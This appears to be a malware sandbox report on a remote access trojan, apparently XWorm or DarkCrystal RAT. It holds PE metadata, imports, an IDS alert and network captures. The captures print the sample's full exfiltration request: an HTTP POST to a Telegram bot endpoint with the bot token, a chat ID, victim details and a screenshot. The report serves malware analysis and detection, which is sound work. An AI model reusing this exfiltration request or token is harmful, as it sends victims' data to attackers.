                                                                                             .text | 0x1000 | 0x32dcc | 0x32e00 | bf3082787caa3b02fd9d989022806d04 | False | 0.592286355958231 | data | 6.705330880207017 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                             .rdata | 0x34000 | 0xb1d0 | 0xb200 | ba53cf76fc539872e6fb32f5b59318a2 | False | 0.46025719803370785 | data | 5.269843738840559 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                             .data | 0x40000 | 0x24750 | 0x1200 | 63d51bc646ae841bb4737f86d3d78592 | False | 0.4058159722222222 | data | 4.083590987791496 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                             .didat | 0x65000 | 0x1a4 | 0x200 | deb77807258e64170eadd0d48c2f3f11 | False | 0.46484375 | data | 3.5190901598372837 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                             .rsrc | 0x66000 | 0xeb98 | 0xec00 | 46c8d29e2dbb6ee93fcbcfa5583fecc7 | False | 0.8745199947033898 | data | 7.693202276478399 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                             .reloc | 0x75000 | 0x23dc | 0x2400 | e49afaf69d5cac6d9ffa2d43bc30363a | False | 0.7861328125 | data | 6.67388754981222 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x66524 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | | | 1.0027729636048528
PNG | 0x6706c | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | | | 0.9363390441839495
RT_ICON | 0x68618 | 0xa1ab | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9967622683451325
RT_DIALOG | 0x727c4 | 0x2ba | data | | | 0.5286532951289399
RT_DIALOG | 0x72a80 | 0x13a | data | | | 0.6560509554140127
RT_DIALOG | 0x72bbc | 0xf2 | data | | | 0.71900826446281
RT_DIALOG | 0x72cb0 | 0x14a | data | | | 0.6
RT_DIALOG | 0x72dfc | 0x314 | data | | | 0.47588832487309646
RT_DIALOG | 0x73110 | 0x24a | data | | | 0.6279863481228669
RT_STRING | 0x7335c | 0x1fc | data | | | 0.421259842519685
RT_STRING | 0x73558 | 0x246 | data | | | 0.41924398625429554
RT_STRING | 0x737a0 | 0x1a6 | data | | | 0.514218009478673
RT_STRING | 0x73948 | 0xdc | data | | | 0.65
RT_STRING | 0x73a24 | 0x470 | data | | | 0.3873239436619718
RT_STRING | 0x73e94 | 0x164 | data | | | 0.5056179775280899
RT_STRING | 0x73ff8 | 0x110 | data | | | 0.5772058823529411
RT_STRING | 0x74108 | 0x158 | data | | | 0.4563953488372093
RT_STRING | 0x74260 | 0xe8 | data | | | 0.5948275862068966
RT_STRING | 0x74348 | 0xe6 | data | | | 0.5695652173913044
RT_GROUP_ICON | 0x74430 | 0x14 | data | | | 1.1
RT_MANIFEST | 0x74444 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | | | 0.3957333333333333
DLL | Import
KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetTimeFormatW, GetDateFormatW, LocalFree, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapReAlloc, HeapAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
03/29/24-15:27:21.388590 | TCP | 2048095 | ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) | 49739 | 80 | 192.168.2.4 | 104.21.79.128
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 29, 2024 15:26:58.496057987 CET | 49730 | 443 | 192.168.2.4 | 34.117.186.192
Mar 29, 2024 15:26:58.496095896 CET | 443 | 49730 | 34.117.186.192 | 192.168.2.4
Mar 29, 2024 15:26:58.496179104 CET | 49730 | 443 | 192.168.2.4 | 34.117.186.192
Mar 29, 2024 15:26:58.507086039 CET | 49730 | 443 | 192.168.2.4 | 34.117.186.192
Mar 29, 2024 15:26:58.507098913 CET | 443 | 49730 | 34.117.186.192 | 192.168.2.4
Mar 29, 2024 15:26:58.790369987 CET | 443 | 49730 | 34.117.186.192 | 192.168.2.4
Mar 29, 2024 15:26:58.790456057 CET | 49730 | 443 | 192.168.2.4 | 34.117.186.192
Mar 29, 2024 15:26:58.792963982 CET | 49730 | 443 | 192.168.2.4 | 34.117.186.192
Mar 29, 2024 15:26:58.792972088 CET | 443 | 49730 | 34.117.186.192 | 192.168.2.4
Mar 29, 2024 15:26:58.793252945 CET | 443 | 49730 | 34.117.186.192 | 192.168.2.4
Mar 29, 2024 15:26:58.836966038 CET | 49730 | 443 | 192.168.2.4 | 34.117.186.192
Mar 29, 2024 15:26:58.847047091 CET | 49730 | 443 | 192.168.2.4 | 34.117.186.192
Mar 29, 2024 15:26:58.892231941 CET | 443 | 49730 | 34.117.186.192 | 192.168.2.4
Mar 29, 2024 15:26:59.071341038 CET | 443 | 49730 | 34.117.186.192 | 192.168.2.4
Mar 29, 2024 15:26:59.071409941 CET | 443 | 49730 | 34.117.186.192 | 192.168.2.4
Mar 29, 2024 15:26:59.071456909 CET | 49730 | 443 | 192.168.2.4 | 34.117.186.192
Mar 29, 2024 15:26:59.076997042 CET | 49730 | 443 | 192.168.2.4 | 34.117.186.192
Mar 29, 2024 15:26:59.079942942 CET | 49731 | 443 | 192.168.2.4 | 34.117.186.192
Mar 29, 2024 15:26:59.079974890 CET | 443 | 49731 | 34.117.186.192 | 192.168.2.4
Mar 29, 2024 15:26:59.080061913 CET | 49731 | 443 | 192.168.2.4 | 34.117.186.192
Mar 29, 2024 15:26:59.080420017 CET | 49731 | 443 | 192.168.2.4 | 34.117.186.192
Mar 29, 2024 15:26:59.080440044 CET | 443 | 49731 | 34.117.186.192 | 192.168.2.4
Mar 29, 2024 15:26:59.351304054 CET | 443 | 49731 | 34.117.186.192 | 192.168.2.4
Mar 29, 2024 15:26:59.354690075 CET | 49731 | 443 | 192.168.2.4 | 34.117.186.192
Mar 29, 2024 15:26:59.354716063 CET | 443 | 49731 | 34.117.186.192 | 192.168.2.4
Mar 29, 2024 15:26:59.640638113 CET | 443 | 49731 | 34.117.186.192 | 192.168.2.4
Mar 29, 2024 15:26:59.640714884 CET | 443 | 49731 | 34.117.186.192 | 192.168.2.4
Mar 29, 2024 15:26:59.641201019 CET | 49731 | 443 | 192.168.2.4 | 34.117.186.192
Mar 29, 2024 15:26:59.653497934 CET | 49731 | 443 | 192.168.2.4 | 34.117.186.192
Mar 29, 2024 15:26:59.888309002 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:26:59.888345003 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:26:59.888418913 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:26:59.890372038 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:26:59.890382051 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.272711992 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.272861004 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:00.276530981 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:00.276540041 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.276912928 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.278119087 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:00.320235968 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.660253048 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:00.660278082 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.661943913 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:00.661950111 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.662059069 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:00.662062883 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.662188053 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:00.662192106 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.663580894 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:00.663593054 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.663738966 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:00.663746119 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.663781881 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:00.663788080 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.663820982 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:00.663826942 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.664031029 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:00.664037943 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.664066076 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:00.664072990 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.664115906 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:00.664123058 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.664154053 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:00.664159060 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.664200068 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:00.664206028 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.664244890 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:00.664252996 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.664273977 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:00.664278030 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.664432049 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:00.664438009 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.664452076 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:00.664469957 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.664501905 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:00.664508104 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.664589882 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:00.664594889 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.664616108 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:00.664624929 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.664707899 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:00.664715052 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.664752007 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:00.664758921 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.664781094 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:00.664787054 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.664882898 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:00.664890051 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.664923906 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:00.664935112 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.664964914 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:00.664971113 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.665282011 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:00.665287971 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.665410995 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:00.665417910 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.665524960 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:00.665548086 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.819519043 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:00.868206024 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:01.770612001 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:01.770699978 CET | 443 | 49732 | 149.154.167.220 | 192.168.2.4
Mar 29, 2024 15:27:01.770737886 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:01.771286011 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Mar 29, 2024 15:27:01.774596930 CET | 49732 | 443 | 192.168.2.4 | 149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 29, 2024 15:26:58.392152071 CET | 55851 | 53 | 192.168.2.4 | 1.1.1.1
Mar 29, 2024 15:26:58.489429951 CET | 53 | 55851 | 1.1.1.1 | 192.168.2.4
Mar 29, 2024 15:26:59.788223028 CET | 55282 | 53 | 192.168.2.4 | 1.1.1.1
Mar 29, 2024 15:26:59.885385036 CET | 53 | 55282 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 29, 2024 15:26:58.392152071 CET | 192.168.2.4 | 1.1.1.1 | 0x8ee3 | Standard query (0) | ipinfo.io | A (IP address) | IN (0x0001) | false
Mar 29, 2024 15:26:59.788223028 CET | 192.168.2.4 | 1.1.1.1 | 0x62c2 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 29, 2024 15:26:58.489429951 CET | 1.1.1.1 | 192.168.2.4 | 0x8ee3 | No error (0) | ipinfo.io | | 34.117.186.192 | A (IP address) | IN (0x0001) | false
Mar 29, 2024 15:26:59.885385036 CET | 1.1.1.1 | 192.168.2.4 | 0x62c2 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• ipinfo.io
• api.telegram.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 34.117.186.192 | 443 | 7784 | C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
Timestamp | Bytes transferred | Direction | Data
2024-03-29 14:26:58 UTC | 61 | OUT | GET /ip HTTP/1.1
Host: ipinfo.io
Connection: Keep-Alive
2024-03-29 14:26:59 UTC | 361 | IN | HTTP/1.1 200 OK
server: nginx/1.24.0
date: Fri, 29 Mar 2024 14:26:58 GMT
content-type: text/plain; charset=utf-8
Content-Length: 13
access-control-allow-origin: *
x-envoy-upstream-service-time: 1
via: 1.1 google
strict-transport-security: max-age=2592000; includeSubDomains
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2024-03-29 14:26:59 UTC | 13 | IN | Data Raw: 31 30 32 2e 31 36 35 2e 34 38 2e 34 33
Data Ascii: 102.165.48.43


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.44973134.117.186.1924437784C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-03-29 14:26:59 UTC42OUTGET /country HTTP/1.1
                                                                                            Host: ipinfo.io
                                                                                            2024-03-29 14:26:59 UTC504INHTTP/1.1 200 OK
                                                                                            server: nginx/1.24.0
                                                                                            date: Fri, 29 Mar 2024 14:26:59 GMT
                                                                                            content-type: text/html; charset=utf-8
                                                                                            Content-Length: 3
                                                                                            access-control-allow-origin: *
                                                                                            x-frame-options: SAMEORIGIN
                                                                                            x-xss-protection: 1; mode=block
                                                                                            x-content-type-options: nosniff
                                                                                            referrer-policy: strict-origin-when-cross-origin
                                                                                            x-envoy-upstream-service-time: 3
                                                                                            via: 1.1 google
                                                                                            strict-transport-security: max-age=2592000; includeSubDomains
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close
                                                                                            2024-03-29 14:26:59 UTC | 3 | IN | Data Raw: 55 53 0a
                                                                                            Data Ascii: US


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            2 | 192.168.2.4 | 49732 | 149.154.167.220 | 443 | 7784 | C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            2024-03-29 14:27:00 UTC | 255 | OUT | POST /bot7194985122:AAGPJPfG5AyMtXi9BvuYYVgyMXP_Fe7EV5o/sendPhoto HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary="4e636f77-7e21-4561-94a7-274b0110f910"
                                                                                            Host: api.telegram.org
                                                                                            Content-Length: 98588
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
                                                                                            2024-03-29 14:27:00 UTC | 40 | OUT | Data Raw: 2d 2d 34 65 36 33 36 66 37 37 2d 37 65 32 31 2d 34 35 36 31 2d 39 34 61 37 2d 32 37 34 62 30 31 31 30 66 39 31 30 0d 0a
                                                                                            Data Ascii: --4e636f77-7e21-4561-94a7-274b0110f910
                                                                                            2024-03-29 14:27:00 UTC | 89 | OUT | Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a
                                                                                            Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
                                                                                            2024-03-29 14:27:00 UTC | 10 | OUT | Data Raw: 36 37 37 30 39 36 36 38 34 37
                                                                                            Data Ascii: 6770966847
                                                                                            2024-03-29 14:27:00 UTC | 131 | OUT | Data Raw: 0d 0a 2d 2d 34 65 36 33 36 66 37 37 2d 37 65 32 31 2d 34 35 36 31 2d 39 34 61 37 2d 32 37 34 62 30 31 31 30 66 39 31 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 61 70 74 69 6f 6e 0d 0a 0d 0a
                                                                                            Data Ascii: --4e636f77-7e21-4561-94a7-274b0110f910Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=caption
                                                                                            2024-03-29 14:27:00 UTC | 159 | OUT | Data Raw: d0 98 d0 9a d0 a1 d0 92 d0 9e d0 a0 d0 9c 20 d0 a1 d0 9a d0 90 d0 a7 d0 90 d0 9b 20 d0 98 d0 94 d0 98 d0 9e d0 a2 20 21 0a 49 44 3a 20 61 30 31 33 38 33 36 32 35 63 62 34 34 62 65 35 30 33 64 32 38 31 65 63 34 30 35 32 33 62 65 36 64 63 30 62 38 30 63 66 0a 43 6f 6d 6d 65 6e 74 3a 20 78 77 6f 72 6d 0a 55 73 65 72 6e 61 6d 65 3a 20 6a 6f 6e 65 73 0a 50 43 20 4e 61 6d 65 3a 20 36 34 32 32 39 34 0a 49 50 3a 20 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 0a 47 45 4f 3a 20 55 53 0a
                                                                                            Data Ascii: !ID: a01383625cb44be503d281ec40523be6dc0b80cfComment: xwormUsername: userPC Name: 642294IP: 102.165.48.43GEO: US
                                                                                            2024-03-29 14:27:00 UTC | 146 | OUT | Data Raw: 0d 0a 2d 2d 34 65 36 33 36 66 37 37 2d 37 65 32 31 2d 34 35 36 31 2d 39 34 61 37 2d 32 37 34 62 30 31 31 30 66 39 31 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 70 68 6f 74 6f 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 0d 0a 0d 0a
                                                                                            Data Ascii: --4e636f77-7e21-4561-94a7-274b0110f910Content-Disposition: form-data; name=photo; filename=screenshot.png; filename*=utf-8''screenshot.png
                                                                                            2024-03-29 14:27:00 UTC | 4096 | OUT | Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                            Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1AQa"q2
                                                                                            2024-03-29 14:27:00 UTC | 4096 | OUT | Data Raw: 0d 1d e8 19 ab e1 9f f9 19 f4 cf fa f8 4f e7 5a ff 00 13 f5 0b 9b 7d 67 ec 51 49 b6 1b 9b 48 8c a0 75 6d af 2e 07 d3 e6 fd 05 63 f8 6b fe 46 6d 37 fe be 53 f9 d7 a4 f8 83 c1 5a 6f 88 ef e3 bc bc 9e ed 24 48 84 40 42 ea 06 01 27 ba 9e 7e 63 5e 2e 2e b5 3a 58 d8 ce a6 dc bf ab 3e 8b 2e a5 52 b6 02 50 a7 bf 37 e8 8f 0c 04 ab 06 52 41 07 20 8e d5 be 9e 25 b8 83 57 b4 d7 21 6f f4 e5 50 97 2b d0 4d 80 06 4f fb c3 af b8 cf 71 5d ff 00 fc 2a bd 0f fe 7e f5 1f fb f8 9f fc 45 27 fc 2a bd 0f fe 7e f5 1f fb f8 9f fc 45 69 3c cb 09 3f 8a ff 00 70 e1 96 e2 e1 f0 db ef 20 f1 1f fc 93 2d 17 fd cb 6f fd 14 6b cf 6b d3 7c 73 6a 96 1e 0c b2 b3 88 b1 8e 09 62 89 4b 1e 48 54 60 33 ef c5 79 9d 56 52 d4 a9 4d af e6 7f 92 39 73 b4 e3 5a 09 ff 00 2a fc d8 94 50 68 af 50 f1 c2 b2
                                                                                            Data Ascii: OZ}gQIHum.ckFm7SZo$H@B'~c^..:X>.RP7RA %W!oP+MOq]*~E'*~Ei<?p -okk|sjbKHT`3yVRM9sZ*PhP
                                                                                            2024-03-29 14:27:00 UTC | 4096 | OUT | Data Raw: 4e 30 c8 a4 7a 62 9b ca e3 29 73 49 dd da df d7 de 4c 73 99 c2 2a 30 8d 95 ee f7 29 31 b4 91 f5 03 a7 43 e5 59 96 22 15 0a 40 c6 39 20 1e 40 27 24 03 c8 18 aa 93 49 67 0e a3 0e af 0d ec 53 dc c7 a5 c7 69 1d a4 71 48 24 13 79 02 23 b8 b2 04 da 0e 4e 43 12 70 06 39 c8 d8 f2 80 18 5c 63 d0 53 3c 84 0d 9f 29 41 f5 c5 55 6c bd 55 a7 18 37 f0 ff 00 c3 19 e1 f3 49 52 a9 3a 8a 3f 17 fc 39 81 a3 cb 15 8d ff 00 86 0c b3 c7 19 b0 d3 ef 60 9d e5 81 9d 23 92 43 3e cd cb b4 ee 07 7a e7 00 8e 79 ab b6 73 e9 df da 36 b7 17 57 fa 7b 5e 59 d8 95 12 8b 59 a3 b4 9a 7d e4 c6 16 34 8b e5 45 07 24 04 50 cc 3a 1c 96 ad 03 14 67 aa 29 fc 28 f2 62 c6 3c b4 c7 fb a2 b9 ff 00 b2 23 cd cc a4 d6 ff 00 8d ff 00 cc ec fe dd 9b 8d a5 04 ff 00 a5 fe 46 2b d9 40 96 57 76 33 ea b6 ef 2d d4
                                                                                            Data Ascii: N0zb)sILs*0)1CY"@9 @'$IgSiqH$y#NCp9\cS<)AUlU7IR:?9`#C>zys6W{^YY}4E$P:g)(b<#F+@Wv3-
